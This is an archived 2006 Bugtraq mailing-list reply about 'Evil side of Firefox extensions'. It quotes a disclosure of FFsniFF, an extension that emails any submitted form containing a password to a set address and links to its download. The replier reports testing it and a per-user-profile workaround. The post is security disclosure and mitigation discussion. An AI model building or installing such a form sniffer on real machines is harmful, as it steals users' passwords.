lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
Date: Wed, 01 Mar 2006 14:02:11 -0600
From: Ben <ben@...geekzone.com>
To: azurIt <azurit@...ox.sk>
Cc: bugtraq@...urityfocus.com
Subject: Re: Evil side of Firefox extensions


azurIt wrote:
> Background
> ----------
> Firefox is very popular and secure web browser. Until now, it is used by
> milions of people and thousands of internet clubs. One of the great features of
> Firefox are extensions. You can use them to create things inside your browser
> which are beyond your imagination. But everything has an other side..
>
> Overview
> --------
> Writting a powerfull extension is extremely simple process. Extensions are
> allowed to do _everything_ with your browser: They can change the skin, block
> banners on pages or even create network connection and send data through it to
> the internet. The worst of all is that _anyone_, who has physical access to
> your computer, can install extensions into your browser _without_ your
> notification.
>
> As an example, I created a simple html form sniffer. You can download it here:
> http://azurit.gigahosting.cz/ffsniff/
>
> It was tested only with Firefox 1.0.x and 1.5.x .
>
> FFsniFF is a simple Firefox extension, which transforms your browser into the
> html form sniffer. Everytime the user click on 'Submit' button, FFsniFF will try
> to find a non-blank password field in the form. If it's found, entire form (also
> with URL) is sent to the specified e-mail address.
>
> Solution
> --------
> I think that the solution for this should be in the ability of locking the
> installation of extensions with a password. Every user will be able to read hash
> of the password (so the browser can verify it) and only system administrator
> will be allowed to change it (it can be stored for example in registers
> [Windows] or somewhere in /etc dir [Linux]).
>
>
> azurIt, azurIt@...net, azurit (at) pobox (dot) sk
>   
I just tested this out at our university using Windows XP and while
anyone can install Firefox extensions, they are installed to their
Firefox profile in the logged in user's Application Data folder. A
simple work around for this is to not have shared systems accounts, at
least for Windows XP. I haven't verified the extension installation
location for other operating systems.

Ben

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ